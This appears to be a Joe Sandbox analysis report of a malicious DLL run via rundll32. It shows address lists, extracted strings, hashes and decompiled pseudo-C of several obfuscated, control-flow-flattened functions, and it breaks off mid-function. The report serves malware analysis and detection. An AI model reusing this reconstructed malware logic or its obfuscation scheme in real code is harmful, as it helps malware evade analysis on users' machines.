0x10015db0
0x10015dbd
0x10015dce
0x10015dd0
0x10015dd2
0x10015dd9
0x10015dde
0x10015de5
0x10015df1
0x10015df6
0x10015e00
0x10015e05
0x10015e0b
0x10015e13
0x10015e1b
0x10015e26
0x10015e31
0x10015e3c
0x10015e44
0x10015e4c
0x10015e54
0x10015e5c
0x10015e69
0x10015e6c
0x10015e70
0x10015e78
0x10015e80
0x10015e8b
0x10015e93
0x10015e9e
0x10015ea6
0x10015eb3
0x10015eb7
0x10015ebc
0x10015ec4
0x10015ed0
0x10015ed3
0x10015edc
0x10015ee0
0x10015ee8
0x10015ef0
0x10015ef5
0x10015efd
0x10015f05
0x10015f0d
0x10015f15
0x10015f1d
0x10015f25
0x10015f2d
0x10015f35
0x10015f3d
0x10015f45
0x10015f4d
0x10015f5a
0x10015f63
0x10015f67
0x10015f6f
0x10015f77
0x10015f81
0x10015f89
0x10015f91
0x10015fa0
0x10015fa3
0x10015fa7
0x10015faf
0x10015fb7
0x10015fbf
0x10015fc7
0x10015fcf
0x10015fd3
0x10015fdb
0x10015fee
0x10015ff5
0x10016000
0x10016008
0x10016010
0x10016015
0x1001601a
0x10016022
0x1001602f
0x10016033
0x10016038
0x10016040
0x10016048
0x10016058
0x1001605c
0x10016064
0x1001606c
0x10016074
0x10016080
0x10016083
0x10016087
0x1001608f
0x10016097
0x1001609f
0x100160a7
0x100160af
0x100160b7
0x100160bf
0x100160c3
0x100160cb
0x100160d3
0x100160db
0x100160e0
0x100160e8
0x100160f0
0x100160f8
0x10016100
0x10016108
0x10016110
0x10016118
0x10016122
0x10016126
0x1001612e
0x10016139
0x10016141
0x1001614c
0x10016154
0x1001615c
0x10016166
0x1001616a
0x10016172
0x1001617a
0x1001617f
0x10016187
0x1001618f
0x10016199
0x100161a1
0x100161a6
0x100161ae
0x100161b6
0x100161be
0x100161c3
0x100161c8
0x100161d0
0x100161db
0x100161e3
0x100161ee
0x100161f6
0x100161fe
0x10016206
0x10016206
0x1001620e
0x1001620e
0x1001620e
0x1001620e
0x10016210
0x00000000
0x00000000
0x10016216
0x100162cb
0x100162d0
0x100162d3
0x100162d8
0x00000000
0x1001621c
0x10016222
0x100163b0
0x10016228
0x1001622e
0x100162a0
0x100162a5
0x100162a8
0x100162ad
0x00000000
0x10016230
0x10016236
0x1001627f
0x10016284
0x10016287
0x10016289
0x00000000
0x10016238
0x1001623e
0x00000000
0x10016244
0x1001625b
0x10016260
0x10016263
0x10016268
0x00000000
0x10016268
0x1001623e
0x10016236
0x1001622e
0x10016222
0x100163b2
0x100163be
0x100163be
0x100162e5
0x10016375
0x1001637a
0x1001637d
0x10016382
0x00000000
0x100162e7
0x100162ed
0x1001634b
0x10016350
0x10016353
0x10016358
0x00000000
0x100162ef
0x100162f5
0x10016321
0x10016326
0x10016329
0x1001632e
0x00000000
0x100162f7
0x100162fd
0x00000000
0x10016303
0x10016303
0x00000000
0x10016303
0x100162fd
0x100162f5
0x100162ed
0x00000000
0x10016384
0x10016384
0x00000000

Strings

^R, xrefs: 10016038
E, xrefs: 1001605C
w, xrefs: 10016097
UPX%, xrefs: 10016303
C6, xrefs: 10015E1B
Cu, xrefs: 100160F0
Yb^q, xrefs: 10015E54
|<, xrefs: 10015E80
UPX%, xrefs: 100162EF
Y,, xrefs: 10015F05

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C6$Cu$UPX%$UPX%$Y,$Yb^q$^R$w$|<$E
API String ID: 0-937103397
Opcode ID: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
Instruction ID: e91972674f3eb71ba7037216d4b2c91072d805a8743603f57f5014319008b3a2
Opcode Fuzzy Hash: 867b8cbbaa225e8eb667e3060bb1b8e4f354686b956b7512de0d7884d6bc3c21
Instruction Fuzzy Hash: 93E102718083818FD3A4CF64D88954BFBF1BBC4748F108A1DF5EA9A260D7B59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 100137F4, Relevance: 11.5, Strings: 9, Instructions: 244
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E100137F4() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				void* _t242;
				signed int _t247;
				void* _t249;
				void* _t250;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t278;
				signed int _t281;
				void* _t282;
				void* _t287;
				signed int* _t289;
				void* _t297;

				_t289 =  &_v684;
				_v580 = 0x2c23da;
				asm("stosd");
				_t250 = 0;
				_t252 = 0x3c;
				asm("stosd");
				_t282 = 0x19809088;
				asm("stosd");
				_v640 = 0xf0d1;
				_v640 = _v640 << 2;
				_v640 = _v640 | 0x5b158a51;
				_v640 = _v640 ^ 0x5b17cbd5;
				_v596 = 0xd18a;
				_v596 = _v596 * 0x68;
				_v596 = _v596 ^ 0x00552011;
				_v624 = 0x272d;
				_v624 = _v624 / _t252;
				_v624 = _v624 ^ 0x00001784;
				_v644 = 0xc09;
				_v644 = _v644 << 8;
				_v644 = _v644 | 0xf1f4736a;
				_v644 = _v644 ^ 0xf1fc5cf6;
				_v616 = 0xc6c6;
				_v616 = _v616 + 0xffff298f;
				_v616 = _v616 ^ 0xffff9aa4;
				_v664 = 0x880f;
				_v664 = _v664 >> 0xd;
				_v664 = _v664 + 0xfac7;
				_v664 = _v664 ^ 0x0000c275;
				_v632 = 0x6cb7;
				_v632 = _v632 + 0x71ae;
				_v632 = _v632 ^ 0xf12e281f;
				_v632 = _v632 ^ 0xf12e892c;
				_v648 = 0x35dc;
				_t253 = 0x11;
				_v648 = _v648 / _t253;
				_v648 = _v648 ^ 0x6afc1010;
				_v648 = _v648 ^ 0x6afc6648;
				_v592 = 0xf9c9;
				_v592 = _v592 + 0xdff3;
				_v592 = _v592 ^ 0x0001b583;
				_v680 = 0x7b8d;
				_t254 = 3;
				_v680 = _v680 * 0x34;
				_v680 = _v680 >> 0x10;
				_v680 = _v680 << 0xe;
				_v680 = _v680 ^ 0x00063d51;
				_v604 = 0xd1fb;
				_v604 = _v604 / _t254;
				_v604 = _v604 ^ 0x000016e7;
				_v600 = 0x6d4a;
				_v600 = _v600 | 0xe95b5ca0;
				_v600 = _v600 ^ 0xe95b5d58;
				_v656 = 0xa6d5;
				_v656 = _v656 * 0x2c;
				_v656 = _v656 ^ 0x2fdaf6b8;
				_v656 = _v656 ^ 0x2fc61d34;
				_v636 = 0x2da6;
				_t255 = 0x61;
				_v636 = _v636 / _t255;
				_v636 = _v636 << 0xf;
				_v636 = _v636 ^ 0x003c31b2;
				_v620 = 0x6f0c;
				_v620 = _v620 + 0x94cb;
				_v620 = _v620 ^ 0x00015a96;
				_v608 = 0x32b0;
				_v608 = _v608 + 0x3f32;
				_v608 = _v608 ^ 0x00007dd4;
				_v684 = 0x29d;
				_v684 = _v684 + 0xad7f;
				_v684 = _v684 | 0x819b4d84;
				_t256 = 0x72;
				_v684 = _v684 / _t256;
				_v684 = _v684 ^ 0x012311d1;
				_v660 = 0x64d5;
				_v660 = _v660 | 0xb65d9e9f;
				_v660 = _v660 + 0xffff3959;
				_v660 = _v660 ^ 0xb65d035f;
				_v612 = 0x140;
				_v612 = _v612 >> 0xf;
				_v612 = _v612 ^ 0x00002c68;
				_v676 = 0xfbaa;
				_v676 = _v676 >> 8;
				_v676 = _v676 + 0x1669;
				_v676 = _v676 ^ 0x03abbef6;
				_v676 = _v676 ^ 0x03ab9f96;
				_v628 = 0xebed;
				_v628 = _v628 + 0x7cae;
				_t257 = 0x47;
				_t281 = _v624;
				_v628 = _v628 * 0x47;
				_v628 = _v628 ^ 0x006452eb;
				_v672 = 0xe594;
				_v672 = _v672 >> 0xc;
				_v672 = _v672 / _t257;
				_v672 = _v672 | 0x6c4d1fae;
				_v672 = _v672 ^ 0x6c4d687d;
				_v668 = 0x6152;
				_v668 = _v668 >> 0xa;
				_v668 = _v668 | 0x4751a645;
				_v668 = _v668 ^ 0x4751bfac;
				_v652 = 0x7c78;
				_t258 = 0x4c;
				_v652 = _v652 / _t258;
				_v652 = _v652 ^ 0x3b31093c;
				_v652 = _v652 ^ 0x3b31089c;
				do {
					while(_t282 != 0xc4cab9f) {
						if(_t282 == 0x1828ae29) {
							_t242 = E10008C0C(_v624, __eflags, _v644, _v616,  &_v524);
							_t289 =  &(_t289[3]);
							__eflags = _t242;
							if(__eflags == 0) {
								L11:
								return _t250;
							}
							_t282 = 0x19f95bd8;
							continue;
						}
						if(_t282 == 0x19809088) {
							_t282 = 0x1828ae29;
							continue;
						}
						if(_t282 == 0x19f95bd8) {
							_t278 = _v596;
							_t281 = E1000492A(_v652, _t278, _v664, _v632, _v648, _v652, _v640, _v592, _v652,  &_v524, _t250, _v680, _v604, _v600);
							_t289 =  &(_t289[0xc]);
							__eflags = _t281 - 0xffffffff;
							if(__eflags == 0) {
								goto L11;
							}
							_t282 = 0x27d5d232;
							continue;
						}
						if(_t282 == 0x27d5d232) {
							_t247 = E100153AE(_v656, _v636, _v620, _t258, _t281, _v608,  &_v564);
							_t258 = _t281;
							_t278 = _v684;
							asm("sbb esi, esi");
							_t282 = ( ~_t247 & 0xfed365d9) + 0xd7945c6;
							E100078F0(_t281, _t278, _v660, _v612, _v676);
							_t289 =  &(_t289[9]);
							goto L19;
						}
						if(_t282 != 0x32ff9f3c) {
							goto L19;
						}
						_t249 = E100023BC();
						_t287 = _v588 - _v548;
						asm("sbb ecx, [esp+0x9c]");
						_t297 = _v584 - _t278;
						if(_t297 >= 0 && (_t297 > 0 || _t287 >= _t249)) {
							_t250 = 1;
						}
						goto L11;
					}
					E10012092(_v628,  &_v588, _v672, _v668);
					_pop(_t258);
					_t282 = 0x32ff9f3c;
					L19:
					__eflags = _t282 - 0xd7945c6;
				} while (__eflags != 0);
				goto L11;
			}

0x100137f4
0x100137fa
0x1001380e
0x1001380f
0x10013813
0x10013816
0x10013817
0x1001381c
0x1001381d
0x10013825
0x1001382a
0x10013832
0x1001383a
0x10013847
0x1001384b
0x10013853
0x10013863
0x10013867
0x1001386f
0x10013877
0x1001387c
0x10013884
0x1001388c
0x10013894
0x1001389c
0x100138a4
0x100138ac
0x100138b1
0x100138b9
0x100138c1
0x100138c9
0x100138d1
0x100138d9
0x100138e1
0x100138ed
0x100138f2
0x100138f8
0x10013900
0x10013908
0x10013910
0x10013918
0x10013920
0x1001392d
0x10013930
0x10013934
0x10013939
0x1001393e
0x10013946
0x10013954
0x10013958
0x10013960
0x10013968
0x10013970
0x10013978
0x10013985
0x10013989
0x10013991
0x1001399b
0x100139a7
0x100139ac
0x100139b2
0x100139bc
0x100139c4
0x100139cc
0x100139d4
0x100139dc
0x100139e4
0x100139ec
0x100139f4
0x100139fc
0x10013a04
0x10013a10
0x10013a15
0x10013a1b
0x10013a23
0x10013a2b
0x10013a33
0x10013a3b
0x10013a43
0x10013a4b
0x10013a50
0x10013a58
0x10013a60
0x10013a65
0x10013a6d
0x10013a75
0x10013a7d
0x10013a85
0x10013a92
0x10013a95
0x10013a99
0x10013a9d
0x10013aa5
0x10013aad
0x10013aba
0x10013abe
0x10013ac6
0x10013ace
0x10013ad6
0x10013adb
0x10013ae3
0x10013aeb
0x10013af7
0x10013afa
0x10013afe
0x10013b06
0x10013b0e
0x10013b0e
0x10013b1c
0x10013c44
0x10013c49
0x10013c4c
0x10013c4e
0x10013b79
0x10013b82
0x10013b82
0x10013c54
0x00000000
0x10013c54
0x10013b28
0x10013c29
0x00000000
0x10013c29
0x10013b34
0x10013c01
0x10013c11
0x10013c13
0x10013c16
0x10013c19
0x00000000
0x00000000
0x10013c1f
0x00000000
0x10013c1f
0x10013b40
0x10013b9d
0x10013ba8
0x10013bb4
0x10013bb8
0x10013bc0
0x10013bc6
0x10013bcb
0x00000000
0x10013bcb
0x10013b48
0x00000000
0x00000000
0x10013b4e
0x10013b57
0x10013b62
0x10013b69
0x10013b6b
0x10013b75
0x10013b75
0x00000000
0x10013b6b
0x10013c6e
0x10013c74
0x10013c75
0x10013c7a
0x10013c7a
0x10013c7a
0x00000000

Strings

h,, xrefs: 10013A50
2?, xrefs: 100139E4
Ra, xrefs: 10013ACE
x|, xrefs: 10013AEB
X][, xrefs: 10013970
-', xrefs: 10013853
Rd, xrefs: 10013A9D
<1;, xrefs: 10013AFE
}hMl, xrefs: 10013AC6

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -'$2?$<1;$Ra$X][$h,$x|$}hMl$Rd
API String ID: 0-2401909234
Opcode ID: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
Instruction ID: 5388816bb5d1eecf1ba6e6649f08daf6316018bad176c26ee88db10dcf1e4ca8
Opcode Fuzzy Hash: 91d6f69f52cec33eb150c8f23eacba65fbe3d1b3256e5b72d9c82c4956ed300c
Instruction Fuzzy Hash: 61B110725083809FE358CF65C48A94BBBE2FBC4358F108A1DF5959A2A0D7B5D948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10015115, Relevance: 11.4, Strings: 9, Instructions: 139
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10015115() {
				char _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _t117;
				signed int _t120;
				signed int _t122;
				signed int _t125;
				void* _t126;
				signed int _t138;
				signed int _t139;
				intOrPtr _t141;
				signed int _t143;
				signed int* _t144;

				_t144 =  &_v568;
				_v528 = 0x5aebe;
				_t141 = 0;
				_t126 = 0xdd78c1f;
				_v524 = 0;
				_v568 = 0xe0a6;
				_v568 = _v568 + 0xefcc;
				_v568 = _v568 >> 3;
				_v568 = _v568 + 0xffffba73;
				_v568 = _v568 ^ 0xfffff0ad;
				_v564 = 0x6b83;
				_t138 = 0x25;
				_v564 = _v564 / _t138;
				_v564 = _v564 << 2;
				_v564 = _v564 >> 2;
				_v564 = _v564 ^ 0x0000048b;
				_v556 = 0xe5d8;
				_t139 = 0x1f;
				_v556 = _v556 * 0x31;
				_v556 = _v556 ^ 0x577859bf;
				_v556 = _v556 / _t139;
				_v556 = _v556 ^ 0x02d16e7d;
				_v552 = 0x540d;
				_v552 = _v552 * 0x44;
				_v552 = _v552 * 0x6c;
				_v552 = _v552 + 0xffff4b52;
				_v552 = _v552 ^ 0x096ab6e1;
				_v548 = 0x2240;
				_v548 = _v548 | 0x13356285;
				_v548 = _v548 ^ 0x133520ec;
				_v560 = 0x478b;
				_v560 = _v560 >> 4;
				_v560 = _v560 + 0x6d64;
				_v560 = _v560 + 0xffffa9cd;
				_v560 = _v560 ^ 0x00004ab1;
				_v532 = 0x9667;
				_v532 = _v532 << 4;
				_v532 = _v532 ^ 0x00090457;
				_t140 = _v548;
				_t143 = _v548;
				_t125 = _v548;
				_v540 = 0x3ff9;
				_v540 = _v540 * 0x59;
				_v540 = _v540 | 0xbbcf382b;
				_v540 = _v540 ^ 0xbbdf4460;
				_v536 = 0x71ad;
				_v536 = _v536 ^ 0xa8de0853;
				_v536 = _v536 ^ 0xa8de4efe;
				_v544 = 0x526a;
				_v544 = _v544 | 0x2fe28bf9;
				_v544 = _v544 ^ 0x2fe2ff10;
				do {
					while(_t126 != 0xdd78c1f) {
						if(_t126 == 0x116c8390) {
							_t117 = E1000929E();
							_t140 = _t117;
							__eflags = _t117;
							if(__eflags == 0) {
								L9:
								return _t141;
							}
							_t126 = 0x1a95d21f;
							continue;
						}
						if(_t126 == 0x1326aa4f) {
							_t120 = E10001E13(_v548, _v560, _v532, _v540,  &_v520);
							_t144 =  &(_t144[3]);
							_t143 = _t120;
							_t126 = 0x217dee79;
							continue;
						}
						if(_t126 == 0x1a95d21f) {
							_t122 = E1000D44C(_t140, _v564, __eflags, _t126,  &_v520, _v556, _v552);
							_t144 =  &(_t144[4]);
							__eflags = _t122;
							if(__eflags == 0) {
								goto L9;
							}
							_t126 = 0x1326aa4f;
							continue;
						}
						if(_t126 == 0x217dee79) {
							_t125 = E1001C424(_t143, _v544);
							_t126 = 0x3152545d;
							continue;
						}
						if(_t126 != 0x3152545d) {
							goto L17;
						}
						_v568 = 0x3661;
						_v568 = _v568 << 0xe;
						_v568 = _v568 * 5;
						_v568 = _v568 + 0xbb88;
						_v568 = _v568 ^ 0x69defb6a;
						if(_t125 == _v568) {
							_t141 = 1;
						}
						goto L9;
					}
					_t126 = 0x116c8390;
					L17:
					__eflags = _t126 - 0x64d23cb;
				} while (__eflags != 0);
				goto L9;
			}

0x10015115
0x1001511b
0x10015128
0x1001512a
0x1001512f
0x10015133
0x1001513b
0x10015143
0x10015148
0x10015150
0x10015158
0x10015167
0x1001516c
0x10015172
0x10015177
0x1001517c
0x10015184
0x10015191
0x10015192
0x10015196
0x100151a4
0x100151a8
0x100151b0
0x100151bd
0x100151c6
0x100151ca
0x100151d2
0x100151da
0x100151e2
0x100151ea
0x100151f2
0x100151fa
0x100151ff
0x10015207
0x1001520f
0x10015217
0x1001521f
0x10015224
0x1001522c
0x10015230
0x10015234
0x10015238
0x10015245
0x10015249
0x10015251
0x10015259
0x10015261
0x10015269
0x10015271
0x10015279
0x10015281
0x10015289
0x10015289
0x1001529b
0x10015378
0x1001537d
0x1001537f
0x10015381
0x100152f9
0x10015304
0x10015304
0x10015387
0x00000000
0x10015387
0x100152a7
0x10015360
0x10015365
0x10015368
0x1001536a
0x00000000
0x1001536a
0x100152b3
0x10015335
0x1001533a
0x1001533d
0x1001533f
0x00000000
0x00000000
0x10015341
0x00000000
0x10015341
0x100152bb
0x10015315
0x10015317
0x00000000
0x10015317
0x100152c3
0x00000000
0x00000000
0x100152c9
0x100152d1
0x100152db
0x100152df
0x100152e7
0x100152f3
0x100152f7
0x100152f7
0x00000000
0x100152f3
0x10015391
0x10015396
0x10015396
0x10015396
0x00000000

Strings

T, xrefs: 100151B0
y}!, xrefs: 1001536A
a6, xrefs: 100152C9
dm, xrefs: 100151FF
jR, xrefs: 10015271
@", xrefs: 100151DA
y}!, xrefs: 100152B5
]TR1, xrefs: 100152BD
]TR1, xrefs: 10015317

Memory Dump Source

Source File: 00000007.00000002.2098137627.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098148687.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2098154346.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: T$@"$]TR1$]TR1$a6$dm$jR$y}!$y}!
API String ID: 0-2886613653
Opcode ID: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
Instruction ID: 092e755a5dcb822a0ee83699db47e88b3ee05a0ce695016b2a566ce4ce8947d0
Opcode Fuzzy Hash: 9f8fb6bfe239287454dccb0f102526f4b7d4ba8770cf1b58457d1acbfbff7d93
Instruction Fuzzy Hash: 51514571508341DFD384CF65C48541FBBE1FBC8798F144A1EF5A69A260D3B9CA898F86

Uniqueness

Uniqueness Score: -1.00%

Function 1000620A, Relevance: 10.4, Strings: 8, Instructions: 375
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E1000620A(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				signed int _v132;
				intOrPtr _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* _t338;
				intOrPtr _t364;
				void* _t377;
				signed int _t380;
				intOrPtr _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				intOrPtr _t395;
				void* _t422;
				intOrPtr* _t430;
				signed int _t433;
				intOrPtr _t438;
				signed int* _t440;
				void* _t443;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t338);
				_v80 = 0xcc9d;
				_t440 =  &(( &_v168)[6]);
				_t386 = 0;
				_t433 = 0x16bff9b6;
				_t438 = 0;
				_t388 = 0x11;
				_v80 = _v80 / _t388;
				_v80 = _v80 + 0xffff11cc;
				_v80 = _v80 ^ 0xffff7c6a;
				_v44 = 0x1a06;
				_v44 = _v44 << 1;
				_v44 = _v44 ^ 0x00002b89;
				_v160 = 0x27c9;
				_v160 = _v160 >> 9;
				_v160 = _v160 << 7;
				_v160 = _v160 << 7;
				_v160 = _v160 ^ 0x0004f334;
				_v168 = 0x8961;
				_v168 = _v168 + 0x1e8b;
				_v168 = _v168 << 0x10;
				_v168 = _v168 ^ 0xca952250;
				_v168 = _v168 ^ 0x6d795972;
				_v40 = 0xb8c6;
				_t389 = 0x25;
				_v40 = _v40 / _t389;
				_v40 = _v40 ^ 0x00002ddd;
				_v140 = 0xf458;
				_v140 = _v140 + 0x660b;
				_v140 = _v140 << 0xd;
				_t390 = 0x3b;
				_v140 = _v140 / _t390;
				_v140 = _v140 ^ 0x00bbd1d1;
				_v84 = 0x2cf9;
				_v84 = _v84 ^ 0xe2cb4fb4;
				_v84 = _v84 | 0x3d81796a;
				_v84 = _v84 ^ 0xffcb5ef8;
				_v156 = 0xe047;
				_v156 = _v156 + 0xec23;
				_v156 = _v156 | 0xc96a13e4;
				_v156 = _v156 ^ 0x1a962ea6;
				_v156 = _v156 ^ 0xd3fdba9b;
				_v108 = 0x4236;
				_v108 = _v108 >> 8;
				_v108 = _v108 + 0xffff4e26;
				_v108 = _v108 ^ 0xffff2512;
				_v24 = 0xcb45;
				_t391 = 0x77;
				_v24 = _v24 * 0xf;
				_v24 = _v24 ^ 0x000bb0ab;
				_v100 = 0xb258;
				_v100 = _v100 * 0x6b;
				_v100 = _v100 / _t391;
				_v100 = _v100 ^ 0x0000cac4;
				_v16 = 0xab6c;
				_v16 = _v16 + 0x630c;
				_v16 = _v16 ^ 0x0001587e;
				_v20 = 0xcdcd;
				_v20 = _v20 + 0xffff01ab;
				_v20 = _v20 ^ 0xfffff9e5;
				_v60 = 0xefa6;
				_t392 = 0x4c;
				_v60 = _v60 * 0x26;
				_v60 = _v60 ^ 0x0023a95c;
				_v112 = 0x9292;
				_v112 = _v112 + 0xffff5686;
				_v112 = _v112 / _t392;
				_v112 = _v112 ^ 0x035e352f;
				_v96 = 0x9b3d;
				_v96 = _v96 + 0xb399;
				_v96 = _v96 + 0xffffc9ce;
				_v96 = _v96 ^ 0x000113bb;
				_v152 = 0x851e;
				_v152 = _v152 + 0x4a3f;
				_v152 = _v152 | 0x2010aaec;
				_t393 = 0xa;
				_v152 = _v152 * 0x5f;
				_v152 = _v152 ^ 0xe64968ad;
				_v124 = 0x3cc7;
				_v124 = _v124 << 0xe;
				_v124 = _v124 + 0x9bc0;
				_v124 = _v124 ^ 0x0f321da8;
				_v116 = 0xd63e;
				_v116 = _v116 + 0x90bc;
				_v116 = _v116 * 0x13;
				_v116 = _v116 ^ 0x001aea95;
				_v32 = 0xbd6a;
				_v32 = _v32 | 0xd1e4c041;
				_v32 = _v32 ^ 0xd1e4a4ec;
				_v88 = 0xac52;
				_v88 = _v88 | 0x10312b45;
				_v88 = _v88 * 0x50;
				_v88 = _v88 ^ 0x0f86db5e;
				_v52 = 0xe981;
				_v52 = _v52 | 0xae117bb0;
				_v52 = _v52 ^ 0xae11932c;
				_v144 = 0x1dfb;
				_v144 = _v144 | 0x48b114e1;
				_v144 = _v144 + 0xfffff9cd;
				_v144 = _v144 >> 3;
				_v144 = _v144 ^ 0x0916476d;
				_v56 = 0xf206;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x00005f8d;
				_v92 = 0xe052;
				_v92 = _v92 + 0x2471;
				_v92 = _v92 + 0xffffdbed;
				_v92 = _v92 ^ 0x0000938e;
				_v68 = 0xe0f9;
				_v68 = _v68 * 0x31;
				_v68 = _v68 + 0xffff857e;
				_v68 = _v68 ^ 0x002a9bd7;
				_v48 = 0x94fa;
				_v48 = _v48 / _t393;
				_v48 = _v48 ^ 0x00004295;
				_v132 = 0xaea7;
				_v132 = _v132 | 0xc9193032;
				_v132 = _v132 ^ 0x9bfcaca0;
				_v132 = _v132 + 0xffff6354;
				_v132 = _v132 ^ 0x52e462fc;
				_v76 = 0xa7e3;
				_v76 = _v76 | 0xf0f94981;
				_v76 = _v76 + 0xffff9c41;
				_v76 = _v76 ^ 0xf0f9e006;
				_v164 = 0x36ff;
				_v164 = _v164 + 0xffff2d0d;
				_v164 = _v164 + 0x7fd2;
				_t394 = 0x7d;
				_v164 = _v164 * 0x77;
				_v164 = _v164 ^ 0xfff2f01d;
				_v120 = 0xc712;
				_v120 = _v120 | 0x5aa592ba;
				_v120 = _v120 + 0x46e1;
				_v120 = _v120 ^ 0x5aa67fba;
				_v28 = 0x86a8;
				_t395 = _v136;
				_v28 = _v28 / _t394;
				_v28 = _v28 ^ 0x0000629f;
				_v36 = 0xa6d4;
				_v36 = _v36 + 0xffffc65c;
				_v36 = _v36 ^ 0x00006d44;
				_v72 = 0x4693;
				_v72 = _v72 | 0x8261f221;
				_v72 = _v72 >> 7;
				_v72 = _v72 ^ 0x0104c1d4;
				_v104 = 0x1547;
				_v104 = _v104 >> 9;
				_v104 = _v104 * 0x6e;
				_v104 = _v104 ^ 0x0000044d;
				_v148 = 0xcfb0;
				_v148 = _v148 >> 6;
				_v148 = _v148 | 0xbecf16fe;
				_v148 = _v148 ^ 0xbecf17ff;
				_v64 = 0x449d;
				_v64 = _v64 << 0xd;
				_v64 = _v64 * 0x30;
				_v64 = _v64 ^ 0x9bae0001;
				_t430 = _v12;
				while(1) {
					L1:
					_t364 = _v128;
					while(1) {
						_t422 = 0x1994d475;
						while(1) {
							L3:
							_t443 = _t433 - _t422;
							if(_t443 > 0) {
								goto L20;
							}
							L4:
							if(_t443 == 0) {
								E10015963(_a16, _v148, _t438, _v92, _v68);
								_t440 =  &(_t440[3]);
								goto L19;
							} else {
								if(_t433 == 0x18ba6df) {
									_t430 = _t430 + 0x2c;
									asm("sbb esi, esi");
									_t433 = (_t433 & 0x01739b49) + 0x4550e01;
									continue;
								} else {
									if(_t433 == 0x2f8e7bf) {
										_t377 = E10012249(_a12, _v40, _t395, _t395, _v140, _v84, _v156, _v108, _t386, _t395, _t395, _v24, _t395,  &_v12, _t395,  &_v8);
										_t440 =  &(_t440[0xe]);
										if(_t377 == 0) {
											L19:
											_t433 = 0x4550e01;
											goto L13;
										} else {
											_t380 = E10017B6B();
											_t433 = 0x5c8a94a;
											_t364 = _v12 * 0x2c + _t386;
											_v128 = _t364;
											_t430 =  >=  ? _t386 : (_t380 & 0x0000001f) * 0x2c + _t386;
											goto L14;
										}
										L33:
										return _t364;
									} else {
										if(_t433 == 0x4550e01) {
											_t296 =  &_v48; // 0x6d44
											E100091CD( *_t296, _v132, _v76, _t438, _v164);
											_t440 =  &(_t440[3]);
											_t433 = 0x2fd49dd4;
											L13:
											_t364 = _v128;
											L14:
											_t395 = _v136;
											_t422 = 0x1994d475;
											continue;
										} else {
											if(_t433 == 0x5c8a94a) {
												_t395 = E10017C1D(_v20, _v60, _a12,  *_t430, _v64, _v112);
												_t440 =  &(_t440[4]);
												_v136 = _t395;
												_t433 =  !=  ? 0x2d7fc8f5 : 0x18ba6df;
												goto L1;
											} else {
												if(_t433 == 0x16bff9b6) {
													_t433 = 0x1a134602;
													while(1) {
														L3:
														_t443 = _t433 - _t422;
														if(_t443 > 0) {
															goto L20;
														}
														goto L4;
													}
													goto L20;
												}
											}
										}
									}
								}
							}
							L30:
							if(_t433 != 0x399cbc9a) {
								_t364 = _v128;
								_t395 = _v136;
								continue;
							}
							goto L33;
							L20:
							if(_t433 == 0x1a134602) {
								_push(_t395);
								_t364 = E100157E8(0x20000);
								_t386 = _t364;
